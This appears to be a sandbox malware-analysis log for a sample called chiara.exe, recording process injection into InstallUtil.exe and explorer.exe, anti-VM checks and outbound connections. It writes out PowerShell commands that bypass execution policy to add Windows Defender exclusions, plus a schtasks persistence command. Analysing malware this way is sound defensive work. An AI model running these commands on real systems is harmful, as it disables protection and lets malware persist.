Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCCAB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	2_2_00007FF6CCCAB190
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCCBFCA0 FindFirstFileExA,	2_2_00007FF6CCCBFCA0

Source: C:\Users\user\Desktop\chiara.exe

Code function: 2_2_00007FF6CCCB16A4 VirtualQuery,GetSystemInfo,

2_2_00007FF6CCCB16A4

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Windows Logon Application.exe	Thread delayed: delay time: 922337203685477

Source: shost.exe, 0000000B.00000002.2577651700.00000000059D0000.00000004.08000000.00040000.00000000.sdmp, shost.exe, 0000000B.00000002.2572034544.00000000043CB000.00000004.00000800.00020000.00000000.sdmp, shost.exe, 0000000B.00000002.2572034544.000000000453F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VBoxTray
Source: explorer.exe, 00000004.00000003.2819534174.000000000069C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3260042369.000000000069C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH<j%SystemRoot%\system32\mswsock.dll
Source: explorer.exe, 00000004.00000003.2819534174.00000000006C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3260042369.00000000006C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3275514312.0000013EB4E54000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000006.00000002.3267502809.0000013EAF82B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW l
Source: explorer.exe, 00000004.00000003.2819534174.000000000069C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3260042369.000000000069C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWL
Source: shost.exe, 0000000B.00000002.2572034544.000000000453F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 2051979379GSOFTWARE\VMware, Inc.\VMware VGAuth
Source: InstallUtil.exe, 00000015.00000002.3285101368.0000000006821000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlltt

Source: C:\Users\user\Desktop\chiara.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\chiara.exe

Code function: 2_2_00007FF6CCCB76D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

2_2_00007FF6CCCB76D8

Source: C:\Users\user\Desktop\chiara.exe

Code function: 2_2_00007FF6CCCC0D20 GetProcessHeap,

2_2_00007FF6CCCC0D20

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCCB76D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FF6CCCB76D8
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCCB3170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FF6CCCB3170
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCCB3354 SetUnhandledExceptionFilter,	2_2_00007FF6CCCB3354
Source: C:\Users\user\Desktop\chiara.exe	Code function: 2_2_00007FF6CCCB2510 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00007FF6CCCB2510

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\Resources\Themes\explorer.exe	Network Connect: 74.125.133.82 80	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Network Connect: 74.125.71.82 80	Jump to behavior
Source: C:\Windows\Resources\Themes\explorer.exe	Network Connect: 66.102.1.82 80	Jump to behavior

Adds a directory exclusion to Windows Defender

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Windows Logon Application.exe'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Windows Logon Application.exe'

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 370000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 3D0000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7C0000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write

Bypasses PowerShell execution policy

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe'

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 370000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 3D0000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7C0000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\svchost.exe	Memory written: PID: 7724 base: 1C0000 value: 00
Source: C:\Windows\System32\svchost.exe	Memory written: PID: 7724 base: 37B2D8 value: 00
Source: C:\Windows\System32\svchost.exe	Memory written: PID: 7724 base: 37C1E8 value: 00

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 370000
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 372000
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 384000
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 39E000
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 568008
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 3D0000
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 3D2000
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 3E4000
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 3FE000
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 476008
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7C0000
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7C2000
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7D4000
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7EE000
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 55F008
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 414000
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 42E000
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: D61008
Source: C:\Windows\System32\consent.exe	Memory written: C:\Windows\System32\svchost.exe base: 34124FE8C8

Source: C:\Users\user\Desktop\chiara.exe

Code function: 2_2_00007FF6CCCAB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

2_2_00007FF6CCCAB190

Source: C:\Users\user\Desktop\chiara.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\Resources\Themes\explorer.exe "C:\windows\resources\themes\explorer.exe" RO
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\consent.exe consent.exe 5152 322 0000013E5E228840
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\Resources\svchost.exe "C:\windows\resources\svchost.exe" RO
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'InstallUtil.exe'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Windows Logon Application.exe'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Logon Application.exe'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Logon Application" /tr "C:\Users\user\AppData\Roaming\Windows Logon Application.exe"

Source: C:\Users\user\Desktop\chiara.exe

Code function: 2_2_00007FF6CCC9DC70 cpuid

2_2_00007FF6CCC9DC70

Source: C:\Users\user\Desktop\chiara.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

2_2_00007FF6CCCAA2CC

Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\shost.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
